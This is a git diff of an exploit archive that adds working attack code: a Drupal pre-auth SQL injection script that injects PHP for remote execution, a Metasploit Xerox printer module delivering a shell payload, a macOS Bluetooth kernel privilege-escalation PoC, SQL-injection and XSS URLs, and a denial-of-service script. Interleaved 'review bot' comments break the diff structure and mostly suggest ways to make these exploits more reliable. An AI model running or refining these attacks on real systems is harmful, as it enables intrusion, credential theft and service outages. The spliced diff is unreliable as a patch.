diff --git a/files.csv b/files.csv
index f46a26c55..497694870 100755
--- a/files.csv
+++ b/files.csv
@@ -31660,3 +31660,11 @@ id,file,description,date,author,platform,type,port
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
+35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
+35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100
+35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
+35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0
+35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
+35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
+35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
+35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
diff --git a/platforms/asp/webapps/35154.txt b/platforms/asp/webapps/35154.txt
new file mode 100755
index 000000000..c1a1cd77b
--- /dev/null
+++ b/platforms/asp/webapps/35154.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45588/info
+
+Sigma Portal is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
+
+http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
\ No newline at end of file
diff --git a/platforms/hardware/remote/35151.rb b/platforms/hardware/remote/35151.rb
new file mode 100755
index 000000000..1e61b384d
--- /dev/null
+++ b/platforms/hardware/remote/35151.rb
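Review bot: The advisory says only that the server "consume[s] excessive resources" while the PoC URL's `Width=%27910000&Height=1099000-=` is the whole trigger, so a reader cannot tell which resource is exhausted or why one request suffices. I would add after the impact sentence: `The handler appears to size the generated picture from the unvalidated Width/Height query parameters before rendering it, so a single request with very large values presumably ties up CPU and memory for the duration; the mechanism has not been confirmed against the source.` The leading `%27` (a quote) and the trailing `-=` in the values suggest the parameters are not parsed as integers at all, which is worth stating explicitly, as is the obvious fix: clamp both dimensions to the stored image's bounds and reject non-numeric input.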
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ Rank = GoodRanking
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
+ 'Description' => %{
+ This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
+ supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
+ commands under root priviages.
+ },
+ 'Author' =>
+ [
+ 'Deral "Percentx" Heiland',
+ 'Pete "Bokojan" Arzamendi'
+ ],
+ 'References' =>
+ [
+ ['BID', '52483'],
+ ['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
+ ['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
+ ],
+ 'Privileged' => true,
+ 'License' => MSF_LICENSE,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 512,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic bash-tcp'
+ }
+ },
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [['Automatic', {}]],
+ 'DisclosureDate' => 'Mar 07 2012',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(9100)
+ ], self.class)
+ end
+
+ def exploit
+ print_status("#{rhost}:#{rport} - Sending print job...")
+ firmcode = '%%XRXbegin' + "\x0A"
+ firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
+ firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
+ firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
+ firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
+ firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
+ firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
+ firmcode << '%%OID_ATT_DLM_SIGNATURE 
"ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
+ firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
+ firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
+ firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
+ firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
+ firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
+ firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
+ firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
+ firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
+ firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
+ firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
+ firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
+ firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
+ firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
+ firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
+ firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
+ firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
+ firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
+ firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
+ firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
+ firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
+ firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
+
+ begin
+ connect
+ sock.put(firmcode)
+ handler
+ rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
+ print_error("#{rhost}:#{rport} - #{e.message}")
+
ensure
+ disconnect
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/osx/dos/35153.c b/platforms/osx/dos/35153.c
new file mode 100755
index 000000000..96f19d37b
--- /dev/null
+++ b/platforms/osx/dos/35153.c
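Review bot: The payload is spliced into a double-quoted job header, `firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"`, but the `'Payload'` hash sets `'Space' => 512` and no `'BadChars'`, so an encoded command containing `"` or a newline would presumably close the field early or start a new `%%` header line before the printer sees the whole command. Adding `'BadChars' => "\x0a\x22",` beside `'Space' => 512,` lets the framework pick an encoding that avoids them. The description string misspells the word as `priviages`; it should read `privileges`. The `rescue` only prints the connection error and falls through to `ensure`, which is the usual Tcp-module convention, but a one-line comment such as `# connection failures are reported, not raised` above it would make that deliberate choice visible.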
@@ -0,0 +1,92 @@
+/*
+ * pwn.c, by @rpaleari and @joystick
+ *
+ * This PoC exploits a missing sign check in
+ * IOBluetoothHCIUserClient::SimpleDispatchWL().
+ *
+ * Tested on Mac OS X Mavericks (10.9.4/10.9.5).
+ *
+ * Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
+ *
+ */
+
+#include
+#include
+#include
+#include
+
+#include
+
+uint64_t payload() {
+ /* Your payload goes here. */
+}
+
+int main(void) {
+ /* Map our landing page (kernel will jump at tgt+7) */
+ vm_address_t tgt = 0x0000048800000000;
+ vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
+ vm_protect(mach_task_self(), tgt, 0x1000, 0,
+ VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
+ memset((void *)tgt, 0, 0x1000);
+
+ /* Prepare payload */
+ char *target = (char *)tgt;
+
+ /* mov rax, payload */
+ target[7] = 0x48;
+ target[8] = 0xb8;
+ *((uint64_t *)(&target[9])) = (uint64_t) payload;
+
+ /* jmp rax */
+ target[17] = 0xff;
+ target[18] = 0xe0;
+
+ printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);
+ printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);
+
+ /* Find the vulnerable service */
+ io_service_t service =
+ IOServiceGetMatchingService(kIOMasterPortDefault,
+ IOServiceMatching("IOBluetoothHCIController"));
+
+ if (!service) {
+ return -1;
+ }
+
+ /* Connect to the vulnerable service */
+ io_connect_t port = (io_connect_t) 0;
+ kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
+ IOObjectRelease(service);
+ if (kr != kIOReturnSuccess) {
+ return kr;
+ }
+
+ printf(" [+] Opened connection to service on port: %d\n", port);
+
+ /* The first 8 bytes must be 0, so we don't have to handle following
+ parameters */
+ char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
+ /* Don't really matter for the exploit (ignored due to the 0s above) */
+ "\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ "\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ "\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
+ "\x80\xff\xff\xff"
+ /* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
+ memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
+ need to be adjusted on other Mavericks versions. */
+ "\xa8\xb6\xf5\xff\x80\xff\xff\xff";
+
+ printf(" [+] Launching exploit!\n");
+ kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
+ (uint32_t) 0, /* Selector */
+ NULL, 0, /* input, inputCnt */
+ (const void*) a, /* inputStruct */
+ sizeof(a), /* inputStructCnt */
+ NULL, NULL, NULL, NULL); /* Output stuff */
+
+ /* Exec shell here after payload returns */
+
+ return IOServiceClose(port);
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/35150.php b/platforms/php/webapps/35150.php
new file mode 100755
index 000000000..8b17bfef4
--- /dev/null
+++ b/platforms/php/webapps/35150.php
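Review bot: `vm_allocate(mach_task_self(), &tgt, 0x1000, 0)` requests the fixed address 0x48800000000 (flags 0, not VM_FLAGS_ANYWHERE) and discards the return value, as does the `vm_protect` call after it; if either fails, the following `memset((void *)tgt, 0, 0x1000)` faults in user space before the kernel bug is touched, so a crashed run cannot be told apart from a patched target. Check both, e.g. `if (vm_allocate(mach_task_self(), &tgt, 0x1000, 0) != KERN_SUCCESS) return -1;` and the same pattern around `vm_protect`. `payload()` is declared to return `uint64_t` but has no `return`, so the placeholder is already undefined behaviour under `-Wall`; a `return 0;` after the comment keeps it well-formed until a real payload is dropped in. The `#include` lines are blank in this view, so the headers the PoC depends on could not be checked here.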
@@ -0,0 +1,86 @@
+
+// and Stefan Esser
+//·
+
+include 'common.inc';
+include 'password.inc';
+
+// set values
+$user_id = 0;
+$user_name = '';
+
+$code_inject = 'phpinfo();session_destroy();die("");';
+
+$url = isset($argv[1])?$argv[1]:'';
+$code = isset($argv[2])?$argv[2]:'';
+
+if ($url == '-h') {
+ echo "usage:\n";
+ echo $argv[0].' $url [$code|$file]'."\n";
+ die();
+}
+
+if (empty($url) || strpos($url,'https') === False) {
+ echo "please state the cookie url. It works only with https urls.\n";
+ die();
+}
+
+if (!empty($code)) {
+ if (is_file($code)) {
+ $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
+ } else {
+ $code_inject = $code;
+ }
+}
+
+$code_inject = rtrim($code_inject,';');
+$code_inject .= ';session_destroy();die("");';
+
+if (strpos($url, 'www.') === 0) {
+ $url = substr($url, 4);
+}
+
+$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
+$_SESSION['build_info']['args'][0] = &$_SESSION['string'];
+
+list( , $session_name) = explode('://', $url, 2);
+
+// use insecure cookie with sql inj.
+$cookieName = 'SESS' . 
substr(hash('sha256', $session_name), 0, 32);
+$password = user_hash_password('test');
+
+$session_id = drupal_random_key();
+$sec_ssid = drupal_random_key();
+
+$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION)));
+$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- ";
+
+$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
+
+$ch = curl_init($url);
+
+curl_setopt($ch,CURLOPT_HEADER,True);
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
+curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
+curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
+
+curl_setopt($ch,CURLOPT_HTTPHEADER,array(
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Accept-Language: en-US,en;q=0.5'
+));
+
+curl_setopt($ch,CURLOPT_COOKIE,$cookie);
+
+$output = curl_exec($ch);
+
+curl_close($ch);
+
+echo $output;
\ No newline at end of file
diff --git a/platforms/php/webapps/35155.txt b/platforms/php/webapps/35155.txt
new file mode 100755
index 000000000..41e998579
--- /dev/null
+++ b/platforms/php/webapps/35155.txt
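Review bot: `curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False)` disables certificate validation for a request that the script itself restricts to https URLs and that carries the `S`-prefixed secure-session cookie, so any on-path host can intercept both the injected SQL and the `$code_inject` it wraps; for a PoC aimed at a host you control, remove the line or make it opt-in, e.g. `curl_setopt($ch,CURLOPT_SSL_VERIFYPEER, !in_array('--insecure', $argv));`. The guard `strpos($url,'https') === False` accepts any URL that merely contains the substring; `strpos($url,'https://') !== 0` is the intended test. The script calls `user_hash_password` and `drupal_random_key` from the included `common.inc`/`password.inc`, so it only runs from a Drupal 7 `includes/` directory; the hunk's opening comment lines are blank in this view, so if that requirement is documented there this last point is moot, otherwise a one-line `// run from a Drupal 7 includes/ checkout` header would save the next reader a failed run.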
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/45594/info
+
+CruxCMS is prone to multiple input-validation vulnerabilities, including multiple security-bypass issues, multiple arbitrary-file-upload issues, multiple SQL-injection issues, a local file-include issue, a cross-site-scripting issue and multiple information-disclosure issues. These issues occur because the application fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an unauthorized user to view files and execute local scripts, execute arbitrary script code, bypass certain security restrictions, access or modify data, exploit latent vulnerabilities in the underlying database, gain administrative access, steal cookie-based authentication credentials, and launch other attacks.
+
+CruxCMS 3.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cruxcms.3.0.0/search.php?search=_&max=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,1+FROM+cruxcms_users
+http://www.example.com/cruxcms.3.0.0/links.php?max=1+UNION+ALL+SELECT+1,1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,0x596573+FROM+cruxcms_users
+http://www.example.com/cruxcms.3.0.0/includes/template.php?style=../white.gif
+http://www.example.com/cruxcms.3.0.0/manager/login.php?message=
+http://www.example.com/cruxcms.3.0.0/manager/switcher.php?style[]
+http://www.example.com/cruxcms.3.0.0/search.php?search[]
+http://www.example.com/cruxcms.3.0.0/manager/filetypes.php
+http://www.example.com/cruxcms.3.0.0/styles/andreas01.php
\ No newline at end of file
diff --git a/platforms/php/webapps/35156.txt b/platforms/php/webapps/35156.txt
new file mode 100755
index 000000000..5f97414d3
--- /dev/null
+++ b/platforms/php/webapps/35156.txt
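Review bot: The description promises multiple arbitrary-file-upload and security-bypass issues, but none of the eight PoC URLs exercises either: the first two are UNION-based SQL injection through `max=` that dumps `cruxcms_users`, `includes/template.php?style=../white.gif` is the local-file-include, `login.php?message=` is presumably the XSS, and the `style[]` / `search[]` and bare `filetypes.php` / `andreas01.php` requests look like path or information disclosure. Either add URLs for the upload and bypass vectors or mark them as reported but not demonstrated, and put a one-line legend above the list, e.g. `# 1-2 SQLi (dumps cruxcms_users incl. Password), 3 LFI, 4 XSS, 5-8 info disclosure`, so a reader does not have to reverse each URL to know what it proves.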
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45600/info
+
+Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cpg.1.5.10/help.php?base=1
+&h=czozMzoiPHNjcmlwdD5hbGVydCgnaGVhZGVyJyk7PC9zY3JpcHQ%2bIjs
+&t=czozMToiPHNjcmlwdD5hbGVydCgndGV4dCcpOzwvc2NyaXB0PiI7
\ No newline at end of file
diff --git a/platforms/php/webapps/35157.html b/platforms/php/webapps/35157.html
new file mode 100755
index 000000000..8daaca43f
--- /dev/null
+++ b/platforms/php/webapps/35157.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45600/info
+
+Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
+
+
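Review bot: The `h` and `t` values are not plain script tags: `czozMzoiPHNjcmlwdD5...` base64-decodes to `s:33:"<script>alert('header');</script>";` and the `t` value to `s:31:"<script>alert('text');</script>";`, i.e. PHP-serialized strings, which strongly suggests `help.php` base64-decodes and `unserialize()`s both parameters before echoing them. If so this is a user-controlled `unserialize()` sink as well as reflected XSS, and the advisory should say so, because the fix is then to stop deserializing request data (a whitelist of help topics), not merely to HTML-encode the output. The `%2b` inside the `h` value is the `+` of the base64 alphabet and has to stay URL-encoded for the decode to succeed; a note to that effect next to the URL would stop people "fixing" it.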
\ No newline at end of file
diff --git a/platforms/windows/dos/35158.py b/platforms/windows/dos/35158.py
new file mode 100755
index 000000000..aa9e0e7dd
--- /dev/null
+++ b/platforms/windows/dos/35158.py
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/45602/info
+
+Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
+
+Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.
+
+Mongoose 2.11 is vulnerable; other versions may also be affected.
+
+import socket
+
+host = 'localhost'
+port = 8080
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.settimeout(8)
+s.connect((host, port))
+s.send('GET / HTTP/1.1\r\n'
+ 'Host: ' + host + '\r\n'
+ 'Content-Length: -2147483648\r\n\r\n')
\ No newline at end of file
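Review bot: `s.send(...)` is handed a `str` and may return after a partial write, and the socket is never closed, so under Python 3 the script raises TypeError before anything is sent and under Python 2 a short write can silently drop the crafted `Content-Length` header that is the whole point. Use `s.sendall(('GET / HTTP/1.1\r\n' 'Host: ' + host + '\r\n' 'Content-Length: -2147483648\r\n\r\n').encode('ascii'))` followed by `s.close()`. A comment naming the trigger would also help: `# -2147483648 is INT_MIN; the server presumably parses Content-Length as a signed int and mishandles the negative value`, with "presumably" kept until the Mongoose source is checked.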